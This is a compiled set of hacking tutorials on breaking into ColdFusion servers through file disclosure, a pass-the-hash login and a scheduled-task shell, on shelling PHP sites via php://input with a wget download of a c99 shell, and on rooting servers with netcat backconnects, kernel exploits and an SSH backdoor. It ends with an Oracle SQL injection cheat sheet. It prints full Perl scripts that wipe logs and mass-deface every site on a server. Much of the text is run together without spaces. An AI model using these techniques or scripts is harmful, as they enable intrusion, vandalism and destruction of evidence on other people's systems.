Hacking Cold Fusion Servers - Part I Today I will go over part I of a few tricks we can use to attack Cold Fusion Servers of various versions using a few published methods. Cold Fusion is an Adobe product targeted at Enterprise and Small Business owners. Probably most commonly known for and associated with CFML or Cold Fusion Markup Language, most visually associated with .cfm files on web servers. CF platforms are built on a Java core and as such it also has some built in features which also allow command execution and database interaction. The following should present you with a few methods you can use to check for common vulnerabilities on these platforms, as well as how to exploit them. Most of these were published ages ago in 2010 but there are still many sites which are either running versions which are un-patchable or just simply running unpatched software still.... I will start this series off with the most common vulnerability first, which is the known Local File Disclosure, or LFI, in the 'locale' parameter (also referenced under: CVE-2010-2861). The LFI vulnerability allows us to read files off of the target system, without any authentication. The neat thing that makes this one different than most LFD is that if we play our cards right we can use this vulnerability as a foothold to further penetrate our target, read and see. We first try to find the admin page, as it is the most commonly vulnerable page, but certainly not the only one. You can typically find it at one of the following locations: /CFIDE/administrator/index.cfm /CFIDE/administrator/enter.cfm /CFIDE/componentutils/index.cfm /CFIDE/componentutils/login.cfmYou can determine the version of the CF Server by simply viewing the login page in most cases as the image usually contains the version graphically, like so:
Knowing the version is important as it helps us to determine the appropriate path to use to try and turn this LFD into something useful. Now if you know the full path to the CF '.properties' file then you're in business as it contains the CF admin password hashes. The list of possible paths worth trying are as follows: v6: locale=................CFusionMXlibpassword.propertiesen v7a: locale=................CFusionMX7libpassword.propertiesen v7b: locale=................optcoldfusionmx7libpassword.propertiesen v8: locale=................ColdFusion8libpassword.propertiesen vJRun: locale=....................JRun4serverscfusioncfusion- earcfusion-warWEB-INFcfusionlibpassword.propertiesenIf you have a successful injection for one of the above files, you will see the password hash(es) show up on the page you're injecting into. It will look a bit like this:
NOTE: In version 6 & 7 encryption is not enabled by default, although i never seen a server which did not encrypt the password in hash form. Now you can crack the password hash and login with clear text pass or we can use a little trick to bypass authentication requirements by using a pass- the-hash technique. The login form uses a bit of JavaScript magic to actually create a HMAC hash from the admin password hash and a salt value which is changed every 30 seconds. You can find this salt value by simply viewing the source code for login page, look at second occurrence of the term 'salt' or review form input details. Due to this, we pass the hash and generate the HMAC hash on our own and submit - simulating a successful login! You need to grab the salt from source:
OK, so you now have Password hash and salt in hand.... Here is some code I whipped up to accomplish this task of logging in real quick for you to get the authenticated cookie. Quickly enter the needed details and run it. If successful, you will have the authenticated cookie presented to you in terminal, like so:
Now once you have the authenticated cookie, you're pretty much in. You can use your favorite cookie editor to load up the new 'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>'. Once loaded you simply refresh your browser and your now logged into the administrative panel for Cold Fusion. Now to try and get a shell up on the server.... If you already know the server path to web facing directory then you can move forward, if not you can check the 'Mappings' link on the left under 'Server Settings'. This will show a mapping of all paths for CF, by default the /CFIDE dir should be mapped giving us a usable path in the majority of cases. Mappings page looks like this:
Once path is known we will move to the 'Schedule Tasks' page located under 'Debugging & Logging' on left menu links.
Now you simply point the task scheduler at your remote CFM/JSP shell hosted on a server you control, stored in txt format like an RFI attack payload. You can schedule for a onetime event, it will default to current time so no need to calculate things if your on different time zone :) If you need a username/password to access the remote shell file source then provide as needed in appropriate fields of task scheduler. The next is key, mark the option to 'Publish" to true so it saves the results to a file (i.e. grab our remote shell source, and save to executable). You then provide it with the full path to where you want to write to. In the majority of cases /CFIDE is writable, otherwise poke around or generate errors in SQL queries on site to get path (standard Full Path Disclosure rules still apply here). When you form is all setup you can submit to create the scheduled task.
You will need to click on the green check-mark icon to run the scheduled task, which actually executes it and grabs our shell. If it has problems with remote file you will likely get a warning message of some kind in admin panel, edit and retry. Upon success, you can point your browser at the path you uploaded your shell to. In most cases Cold Fusion is running on Windows system with full NT AUTHORITY/SYSTEM privileges which means you pretty much own the local box now :)
If you find that 'cfexecute' is disabled and blocking your CFM shell from working properly, you can simply re-enable it from the admin panel since you already have access :) NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can actually determine Enterprise vs Standard by requesting a non-existant .jsp file and judging how the server responds! You have now successfully shelled a Cold Fusion Server at this point and in most cases have admin privileges to do what you want (create new user, add to admin group, add/enable RDP, enjoy new RDP). In the rare *nix instances your likely running as nobody or another non-elevated user so the usual post exploit game plan still applies if you want to takeover the whole server (i.e. root the box). Hope you enjoyed this first part of this series, second part to follow shortly....
Hacking Cold Fusion Servers - Part II Now I will go over two more additional vulnerabilities which can be potentially leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability but with small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one as it makes for better attack flow in general this way. Assuming your all set, let's begin.... Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released and they didn't due proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is ok! This exploit will take some coding abilities on your behalf or the ability to use Metasploit as it has a nice pre-built exploit for this one (Java Meterpreter works best for payload). You basically shoot and point with MSF and hope for the best. If the uploader is present it will try to send a multi- part upload request via POST. If successful you should be able to find a shell in '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit but have not successfully exploited this myself so not going to post my code just yet, would like to confirm it first. You have MSF as a crutch for now, can find the module by referencing CVE-2009- 2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'; I will update this section when I have confirmation of working code on my part..... OK, so in addition to the previously shown LFD/LFI to RCE vulneranility we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XEE) Injection in the Data Services which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service condition, which can be achieved by recursive entity injection, attribute blow up and other types of injection. For more information about the implications associated to this vulnerability, refer to the RFC2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler and if it is vulnerable to XEE Injection it will spit back the results we ask for. Here are some common files to check:
/flex2gateway/ /flex2gateway/http /flex2gateway/httpsecure /flex2gateway/cfamfpolling /flex2gateway/amf /flex2gateway/amfpolling /messagebroker/http /messagebroker/httpsecure /blazeds/messagebroker/http /blazeds/messagebroker/httpsecure /samples/messagebroker/http /samples/messagebroker/httpsecure /lcds/messagebroker/http /lcds/messagebroker/httpsecure /lcds-samples/messagebroker/http /lcds-samples/messagebroker/httpsecure You can accomplish this with Hackbar add-on in Firefox easily enough, Burp or Netcat is just as easy. Essentially we can use the below XML Code as a framework for our file injection and enumeration, simply pass it as POST data to the vulnerable Data Service: "<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body </string><string>clientId</string><string>correlationId</string><string> destination</string><string>headers</string><string>messageId</string> <string>operation</string><string>timestamp</string><string>timeToLiv e</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</s tring></traits><string>nil</string><int>1</int></object><string>&x3;</ string><int>5</int><int>0</int><int>0</int></object></body></amfx> " Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read an let the requests rip, like so:
Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed, just make sure you request the proper file type for designated system type (check server response if you have no idea)...
Also in addition to reading files, you can simply pass a directory and it will spit back the directory content, making it very easy to map things out and find files worth reading. Now limited privileges may restrict some file reading but still plenty enough to cause trouble, enumerate lots of info, and possibly even read the site configuration details...
In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities just as common as on PHP or ASP based sites, and 'cfincludes' can enable source disclosures. In many cases the db can be compromised and Java commands maybe leveraged to further extend the potential attack vectors and escalation platform from that of a standard injection so keep your eyes out and don’t be afraid to take on a new site just cause it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places, all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post em here or let me know via PM.
LFI exploitation via php://input [Shelling Sites] Hey guys, Today I'll be explaining how to shell a website using "php://input" method via LFI. So let's get started. Now let's have our target shall we. As an example, your target URL should look like this: Code: http://www.site.com/index.php?page= You can have anything similar to that as long as you can be able to read files and obtain an "include" error. First things first, give it a shot and see if you can read "/etc/passwd" URL will look like: Code: http://www.site.com/index.php?page=/etc/passwd If successful, you'll be having a page that looks like this: Clickthisbar to viewthe original image of 667x422px. Now lets try reading:
Code: /proc/self/environ /proc/self/fd So URL will become: Code: http://www.site.com/index.php?page=/proc/self/environ http://www.site.com/index.php?page=/proc/self/fd Hmm, seemslike nothing isbeing displayed, even though I've added a null-byte at the end of the URL. Clickthisbar to viewthe original image of 651x389px. Well,notto worry,it'stime to use our back up method.The "php://input"methodwillhelpusreadfiles with certain commands, hence enables us to upload a shell. This can be done using the "Hackbar" or by using "Live HTTP headers" I'll show you how to exploit via php://input using the "Hackbar" So lets check what we're supposed to use in the Hackbar Clickthisbar to viewthe original image of 686x190px.
Now let's try putting this method in action. Look at the picture carefully. Clickthisbar to viewthe original image of 800x325px. URL will be: Code: http://www.site.com/index.php?page=php://input and POST DATA: Code: <? system('uname -a'); ?> Other commands List directories Code: <? system('ls'); ?> Identification Code: <? system('id'); ?> Convert format
Code: <? system('mv file.txt file.php'); ?> Alright, let's spawn a shell there now shall we. Grab a shell from sh3ll.org or anywhere else. For now, we'll be using the normal c99 shell Code: http://www.sh3ll.org/c99.txt? Let's use the "wget" command to spawn our shell on the site. So our POST DATA will be: Code: <? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?> This is how it's gonna look like. Clickthisbar to viewthe original image of 680x173px. Now that you've spawn a shell, you can now navigate to your shell on the site. Code: http://www.site.com/shell.php You can watch a video tutorial below so that it'll be easier to understand. Have fun.
Server Rooting Via Shell and Mass defacement script Now let's kill the root: Getting Backconnectionto the server Copythe Netcat directorytoC: Opencommandprompt,type:cd C:NETCAT It'll looklike this: MicrosoftWindows[Version6.1.7600] Copyright(c) 2009 MicrosoftCorporation.All rightsreserved. C:Userskislay>cdc:netcat c:netcat> NowType:nc -l -v -p2121 It'll looklike- c:netcat>nc-l -v-p 2121 listeningon[any] 2121 ... OpenyourShell inyourbrowser,goto the backconnectiontab,if itis notthere geta shell like "B374k"or Anyother thats yourchoice. Specifyyourip& port as 2121. pressconnect,now you'll geta shell tothe server,you can give commandsto the serverthroughthatshell. Getting a Right exploit for the server Type : Uname -a & hitenter. It'll looksomethinglikethis: [admin@www.saijyotishvani.com/home/saijyoti/public_html/cgi-bin]$uname -a Linux dualxeon09.ns5.999servers.com2.6.18-194.26.1.el5#1 SMP Tue Nov9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux It showsthe kernal versionof the serveris:2.6.18-194.26.1.el5 & Year is 2010. You needto findaperfectexploitforit.youcan findthemat- # Exploit-db.com # Packetstormsecurity.org # Th3-0utl4ws.com # Leetupload.com
# r00tw0rm.com Compiling & executing exploit NowI've got an exploit,&itiswritteninC. SoI can't execute itbyjustuploading. but I needtocompile it. Before proceedingfurther, Cdintothe tmpdirectory,cozitis alwayswritable.Sotype: Cd /home/XXXXX/public_html/tmp // The path can be different,replace itwithyours. So firstI'll getthe exploitonthe server,SoItype : Wgethttp://exploitsite.net/exploits/my_exploit.c // Note:There isnosuch site,I'mjust takingitto show you. It'll looksomethingLike this- [admin@www.targetsite.com/home/saijyoti/public_html/tmp]$wget http://exploitsite.net/exploits/my_exploit.c --2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c Resolvingwww.exploitsite.net...120.139.90.84 Connectingtowww.exploitsite.net|120.139.90.84|:80... connected. HTTP requestsent,awaitingresponse...200 OK Length:15088 (15K) [text/x-csrc] Savingto: `my_exploit.c' 0K .......... ....100% 189K=0.08s 2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c'saved[15088/15088] now change the permission of the exploit to 777. Type:Chmod777 my_exploit.c It may looklike: [admin@www.targetsite.com/home/targetsite/public_html/tmp]$ chmod777 ImpelDown.c Nowthe exploitisOnmyserver,I justneedtocompile &execute it. So,I'll give the command:gcc -oexploitexploit.c It'll compile &save the exploitas exploit It may looklike- [admin@www.targetsite.com/home/targetsite/public_html/tmp]$gcc-o exploitexploit.c Nextstepisto execute itSowe'll type: ./exploit It may looklike: [admin@www.targetsite.com/home/targetsite/public_html/tmp]$gcc-o ImpelDown.c
Nowit saygot root. Let'sCheckis ittrue, Type: id It may look like : uid=0(saijyoti) gid=0(saijyoti) groups=0(root) WhichMeans I got root :) Installing Backdoor type : Wgeturlofbackdoor.com/sshdoor.zip Then Type : UnzipSshdoor.zip Then type : ./runpass port ^ replace passwithyourpassword,&a port. Now connectwithputty& enjoyrootprivileges.;) Methods to execute exploits written in other languages #C exploitgcc -o exploitexploit.c chmod+x exploit ./exploit #Perlperl exploit.pl #pythonpython exploit.py #phpphp exploit.php #zip unzipexploit.zip ./run Cleaning Logs # youcan use my logcleanerto clearyour track :D. It iswritteninperl.save itas anything.pl & to execute type:perl anything.pl here isthe code- [perl] #!usr/bin/perl -w#Warningsenabled! #Log cleanerversionPublic #Give CreditsWhere Needed - Kouros! #This tooktime,Hope youfuckinguse it:D #Reportbugs to info@Kouros-bl4ckhat.com #NOTE - YOU MUST BE ROOT! printqq^ #################################### # Log Cleaner3.0 PUBLIC # # Kouros#
# # # VirangarSecurityTeam# # http://www.Kouros-bl4ckhat.com# #################################### ^; while(1) { print"Enter WhichOS: "; #User Input chomp($os= <STDIN>); #Takesit intomemory if($oseq"help"){ print"[+]EnterYour OS!Choose from'linux','aix','sunos','irix'n"; print"[+]HitenterwithOS,Let the scriptdo itsworkn"; print"[+]Note:YouMUST Be Root!n"; print"[+]ContactInfo[at]Kouros-bl4ckhat[dot] Com"; print"[+]ForBug finds...Have Fun!n"; print"[+] - Kouros"; } if($oseq"linux"){ #If linux typed,dothe followingandstartbrackets foreachmy $logphile(@linux){ unlink($logphile) ||print"[-]Fuckedup:"$logphile":$!n"; } } elsif($oseq"sunos"){ #If sunostyped,dothe followingandstartbrackets foreachmy $logphile(@sunos){ unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"aix"){ #If aix typed,dothe followingandstart brackets foreachmy $logphile(@aix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"irix"){ #If irix typed,dothe followingandstartbracket foreachmy $logphile(@irix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } else { print"UmmWTF !?n";} #Logs of Irix Systems { #Start Irix Bracket @irix = ("/var/adm/SYSLOG","/var/adm/sulog","/var/adm/utmp","/var/adm/utmpx", "/var/adm/wtmp","/var/adm/wtmpx","/var/adm/lastlog/", "/usr/spool/lp/log","/var/adm/lp/lp-errs","/usr/lib/cron/log", "/var/adm/loginlog","/var/adm/pacct","/var/adm/dtmp", "/var/adm/acct/sum/loginlog","var/adm/X0msgs","/var/adm/crash/vmcore", "/var/adm/crash/unix")#EndArray } #End Irix Bracket #Log sof Aix Systems { #Start Aix Bracket @aix = ("/var/adm/pacct","/var/adm/wtmp","/var/adm/dtmp","/var/adm/qacct", "/var/adm/sulog","/var/adm/ras/errlog","/var/adm/ras/bootlog", "/var/adm/cron/log","/etc/utmp","/etc/security/lastlog", "/etc/security/failedlogin","usr/spool/mqueue/syslog")#EndArray
} #End Aix Bracket #Logs of SunOSSystems { #Start SunOSBracket @sunos= ("/var/adm/messages","/var/adm/aculogs","/var/adm/aculog", "/var/adm/sulog","/var/adm/vold.log","/var/adm/wtmp", "/var/adm/wtmpx","/var/adm/utmp","/var/adm/utmpx", "/var/adm/log/asppp.log","/var/log/syslog", "/var/log/POPlog","/var/log/authlog","/var/adm/pacct", "/var/lp/logs/lpsched","/var/lp/logs/requests", "/var/cron/logs","/var/saf/_log","/var/saf/port/log") #EndArray } #End Sunosbracket #Logs of Linux Systems { #Start Linux Bracket @linux = ("/var/log/lastlog","/var/log/telnetd","/var/run/utmp", "/var/log/secure","/root/.ksh_history","/root/.bash_history", "/root/.bash_logut","/var/log/wtmp","/etc/wtmp", "/var/run/utmp","/etc/utmp","/var/log","/var/adm", "/var/apache/log","/var/apache/logs","/usr/local/apache/logs", "/usr/local/apache/logs","/var/log/acct","/var/log/xferlog", "/var/log/messages/","/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog","/var/log/proftpd.access_log", "/var/log/httpd/error_log","/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log","/etc/mail/access", "/var/log/qmail", "/var/log/smtpd","/var/log/samba", "/var/log/samba.log.%m","/var/lock/samba","/root/.Xauthority", "/var/log/poplog","/var/log/news.all","/var/log/spooler", "/var/log/news","/var/log/news/news","/var/log/news/news.all", "/var/log/news/news.crit","/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err","/var/log/news/suck.notice", "/var/spool/tmp","/var/spool/errors","/var/spool/logs","/var/spool/locks", "/usr/local/www/logs/thttpd_log","/var/log/thttpd_log", "/var/log/ncftpd/misclog.txt","/var/log/nctfpd.errs", "/var/log/auth") #Endarray } #End linux bracket } #Ends Loop [/perl] Mass deface I've a perl tomass deface sitesonthe server.executeitasthe same way as above. [perl] # MSRml V 0.1 # # # # MOROCCO.SECURITY.RULZmass defacerandlogeraser# # # # codedbyPRI[ll #
# # # !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!# # # # 05/07/2005 # # # # usage : perl MSRml.pl <pathto index># # # # example :perl MSRml.pl /tmp/index.html # # # # the_r00t3r@hotmail.com# #!/usr/bin/perl use strict; my $index = $ARGV[0]; if ($ARGV[0]) { if( -e $index ) { system"echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok!!33[01;37m"n"; system"echo -e "033[01;37mDefacing all homepages..."n"; system"find/ -name "index*"-execcp$index {} ;"; system"find/ -name "main*"-execcp$index {} ;"; system"find/ -name "home*"-execcp$index {} ;"; system"find/ -name "default*"-execcp$index {} ;"; system"echo -e "033[01;37m[+] done ! all sitesinthisbox are defaced!"n"; system"echo -e "033[01;37m----------------------------------------------------------"n"; system"echo -e "033[01;37mCleaningup logs..."n"; system"echo -e "33[01;34m---------erasingdefaultlogfiles(toofast =))---------33[01;37m"n"; if( -e "/var/log/lastlog") { system'rm -rf /var/log/lastlog'; system"echo -e "033[01;37m [*]/var/log/lastlog -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/lastlog - Nosuchfile ordirectory033[01;37m"n"; } if( -e "/var/log/wtmp") { system'rm -rf /var/log/wtmp'; system"echo -e "033[01;37m [*]/var/log/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/wtmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/etc/wtmp") {
system'rm -rf /etc/wtmp'; system"echo -e "033[01;37m [*]/etc/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/wtmp - No such file ordirectory033[01;37m"n"; } if( -e "/var/run/utmp") { system'rm -rf /var/run/utmp'; system"echo -e "033[01;37m [*]/var/run/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/run/utmp - No suchfile ordirectory033[01;37m"n"; } if( -e "/etc/utmp") { system'rm -rf /etc/utmp'; system"echo -e "033[01;37m [*]/etc/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/utmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/log") { system'rm -rf /var/log'; system"echo -e "033[01;37m [*]/var/log-erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log- Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/logs") { system'rm -rf /var/logs'; system"echo -e "033[01;37m [*]/var/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/logs - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/adm") { system'rm -rf /var/adm'; system"echo -e "033[01;37m [*]/var/adm-erasedOk"n"; }
else { system"echo -e "033[01;31m[*]/var/adm - No such file ordirectory033[01;37m"n"; } if( -e "/var/apache/log") { system'rm -rf /var/apache/log'; system"echo -e "033[01;37m [*]/var/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/log - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/apache/logs") { system'rm -rf /var/apache/logs'; system"echo -e "033[01;37m [*]/var/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/logs - Nosuch file ordirectory033[01;37m"n"; } -10- C:UserskislayDesktoprooted.txt25 January2011 20:54 if( -e "/usr/local/apache/log") { system'rm -rf /usr/local/apache/log'; system"echo -e "033[01;37m [*]/usr/local/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/log - Nosuchfile or directory033[01;37m"n"; } if( -e "/usr/local/apache/logs") { system'rm -rf /usr/local/apache/logs'; system"echo -e "033[01;37m [*]/usr/local/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/logs - Nosuchfile or directory033[01;37m"n"; } if( -e "/root/.bash_history") { system'rm -rf /root/.bash_history'; system"echo -e "033[01;37m [*]/root/.bash_history -erasedOk"n";
} else { system"echo -e "033[01;31m[*]/root/.bash_history - Nosuchfile ordirectory033[01;37m"n"; } if( -e "/root/.ksh_history") { system'rm -rf /root/.ksh_history'; system"echo -e "033[01;37m [*]/root/.ksh_history -erasedOk"n"; } else { system"echo-e "033[01;31m[*]/root/.ksh_history - Nosuchfile ordirectory033[01;37m"n"; } system"echo -e "033[01;37m[+] -----doneall defaultlogandbash_historyfileserased!!"n"; system"echo -e "33[01;34m---------Now Erasingthe restof the machine logfiles(canbe long:S)---------33[01;37m"n"; system'find/ -name *.bash_history -execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_historyfiles -erasedOk!"n"; system'find/ -name *.bash_logout-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_logoutfiles -erasedOk!"n"; system'find/ -name "log*"-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all log* files -erasedOk!"n"; system'find/ -name *.log-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.logfiles -erasedOk!"n"; system"echo -e "33[01;34m-------[+] !done all logfileserased![+]-------33[01;37m"n"; system"echo -e "33[01;34m---------------------------------------------------33[01;37m"n"; system"echo -e "33[01;34m-----------------MSRmlV 0.1----------------------33[01;37m"n"; } else { system"echo -e "033[01;31m[-] Failed!the path to u're index couldnotbe found !033[01;37m"n"; exit; } } else { system"echo -e "033[01;37m!!Morocco.Security.Rulzmassdefacerandlogeraser!!"n"; system"echo -e "033[01;37m!!!!!!!!!!!!!!!!!!codedbyPRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n"; system"echo -e "033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!033[01;37m"n"; system"echo -e "033[01;37musage : perl $0 <path toou're index>"n"; system"echo -e "033[01;37mexample : perl $0 /tmp/index.html"n"; exit; }
Getting Shell of a website by W3af Helloeveryone,youall knowaboutMetasploitanduse itto exploitthe targets.Goodgood...butdoyou knowaboutw3af ( WebApplicationAttackandAuditFramework) byRapid7.Yes,Itisalsodevelopedby Rapid7 whichisa famoussecurityfirmanddevelopedMetasploit.Itisnotbiggerthanmetasploit,butit ismore powerful thanthe otherwebtestingtools.OKnow introductionisover.We proceedtothe practical. Requisites : Python andw3af Step 1: Openthe console andtype: target set targetwww.site.com Step 2: Nowtype: plugins Step 3: Nowwe'll lookforavailable pluginstoenable thembytyping: help
Step 5: Nowwe'll chose the pluginfromcategory"audit".Type: audit"name of plugin" (asmentionedinthe picture) You can chose multiple pluginsinone shotlike:audit<plugin1><plugin2><plugin3>..... Step 6: If yousaw any pluginwithconfigoptionmarkedas"YES"thento configure ittype: audit config<plugin>
Step 7: Nowtype: back Step 8: Chose anothercategory:(if youwant) evasion orbruteforce oranyone Step 9: Nowwe are readywithour values,tostart the scanningtype: start scan
Step 10: Afterfinishingthe scan,we'll have toexploitthe target.Sotype: Exploit Step 11: Againtype: ExploitosCommandingShell Step 12: If everythinggoesright,we'llgetthe shell of the server,type: interact0 (zero)
Part - 3  SQL Injection Cheat Sheet  Oracle SQL Injection Cheat Sheet  MSSQL Injection Cheat Sheet  MySQL SQL Injection Cheat Sheet  Postgres SQL Injection Cheat Sheet  Ingres SQL Injection Cheat Sheet  DB2 SQL Injection Cheat Sheet  Informix SQL Injection Cheat Sheet  WordPress Hacking Tricks  DNS Zone TransferVulnerability Exploit  WHMCS Hacking with Sumbit Ticketexploit  WHMCS Auto Exploiter  Oracle Padding Attack Using Brup Suite  HTTP NTLM INFORMATION DISCLOSURE
SQL Injection Cheat Sheet Oracle SQL InjectionCheat Sheet Some useful syntax reminders for SQL Injection into Oracle databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT bannerFROMv$versionWHERE bannerLIKE‘Oracle%’; SELECT bannerFROMv$versionWHERE bannerLIKE‘TNS%’; SELECT versionFROMv$instance; Comments SELECT 1 FROM dual — comment – NB:SELECT statementsmusthave aFROMclause in Oracle sowe have to use the dummytable name ‘dual’whenwe’re notactuallyselectingfromatable. CurrentUser SELECT userFROMdual List Users SELECT username FROMall_usersORDERBY username; SELECT name FROMsys.user$; — priv List Password Hashes SELECT name,password,astatusFROMsys.user$— priv,<= 10g. astatustellsyou if acct islocked SELECT name,spare4FROMsys.user$— priv,11g
PasswordCracker checkpwd will crackthe DES-basedhashesfromOracle 8, 9 and 10. List Privileges SELECT * FROMsession_privs; — currentprivs SELECT * FROMdba_sys_privsWHERE grantee = ‘DBSNMP’; — priv,lista user’s privs SELECT grantee FROMdba_sys_privsWHERE privilege =‘SELECTANY DICTIONARY’; — priv,finduserswithaparticularpriv SELECT GRANTEE,GRANTED_ROLE FROM DBA_ROLE_PRIVS; List DBA Accounts SELECT DISTINCTgrantee FROMdba_sys_privsWHERE ADMIN_OPTION = ‘YES’; — priv,listDBAs,DBA roles CurrentDatabase SELECT global_name FROMglobal_name; SELECT name FROMv$database; SELECT instance_name FROMv$instance; SELECT SYS.DATABASE_NAMEFROMDUAL; List Databases SELECT DISTINCTownerFROMall_tables; — listschemas(one peruser) – AlsoqueryTNSlistenerforotherdatabases. See tnscmd(services|status). List Columns SELECT column_name FROMall_tab_columnsWHEREtable_name =‘blah’; SELECT column_name FROMall_tab_columnsWHEREtable_name =‘blah’and owner= ‘foo’; List Tables SELECT table_name FROMall_tables; SELECT owner,table_name FROMall_tables; FindTables From ColumnName SELECT owner,table_name FROMall_tab_columnsWHEREcolumn_name LIKE ‘%PASS%’;— NB:table namesare uppercase SelectNthRow SELECT username FROM(SELECT ROWNUMr, username FROMall_usersORDERBY username) WHEREr=9; — gets9th row (rowsnumberedfrom1) SelectNthChar SELECT substr(‘abcd’,3,1) FROM dual; — gets 3rd character, ‘c’ Bitwise AND SELECT bitand(6,2) FROMdual; — returns2 SELECT bitand(6,1) FROMdual; — returns0 ASCIIValue ->Char SELECT chr(65) FROMdual; — returnsA Char -> ASCIIValue SELECT ascii(‘A’)FROMdual; — returns65
Casting SELECT CAST(1ASchar) FROM dual; SELECT CAST(’1′ASint) FROMdual; String Concatenation SELECT ‘A’||‘B’ FROMdual; — returnsAB If Statement BEGIN IF 1=1 THEN dbms_lock.sleep(3);ELSEdbms_lock.sleep(0);ENDIF;END; — doesn’tplaywell withSELECTstatements Case Statement SELECT CASEWHEN 1=1 THEN 1 ELSE 2 END FROMdual; — returns1 SELECT CASEWHEN 1=2 THEN 1 ELSE 2 END FROMdual; — returns2 AvoidingQuotes SELECT chr(65) ||chr(66) FROMdual; — returnsAB Time Delay BEGIN DBMS_LOCK.SLEEP(5);END; — priv,can’t seemtoembedthisina SELECT SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROMdual; — if reverse looksare slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROMdual; — if forwardlookupsare slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROMdual; — if outboundTCPis filtered/slow – Alsosee HeavyQueries tocreate atime delay Make DNSRequests SELECT UTL_INADDR.get_host_address(‘google.com’) FROMdual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROMdual; Command Execution Javacan be usedto execute commandsif it’sinstalled.ExtProccansometimesbe usedtoo,thoughit normallyfailedforme. Local File Access UTL_FILE can sometimesbe used. Checkthatthe followingisnon-null: SELECT value FROMv$parameter2WHERE name = ‘utl_file_dir’;Javacanbe used to readand write filesif it’sinstalled(itisnotavailable inOracle Express). Hostname,IP Address SELECT UTL_INADDR.get_host_name FROMdual; SELECT host_name FROMv$instance; SELECT UTL_INADDR.get_host_addressFROMdual; — gets IPaddress SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROMdual; — getshostnames Locationof DB files SELECT name FROMV$DATAFILE; Default/System SYSTEM
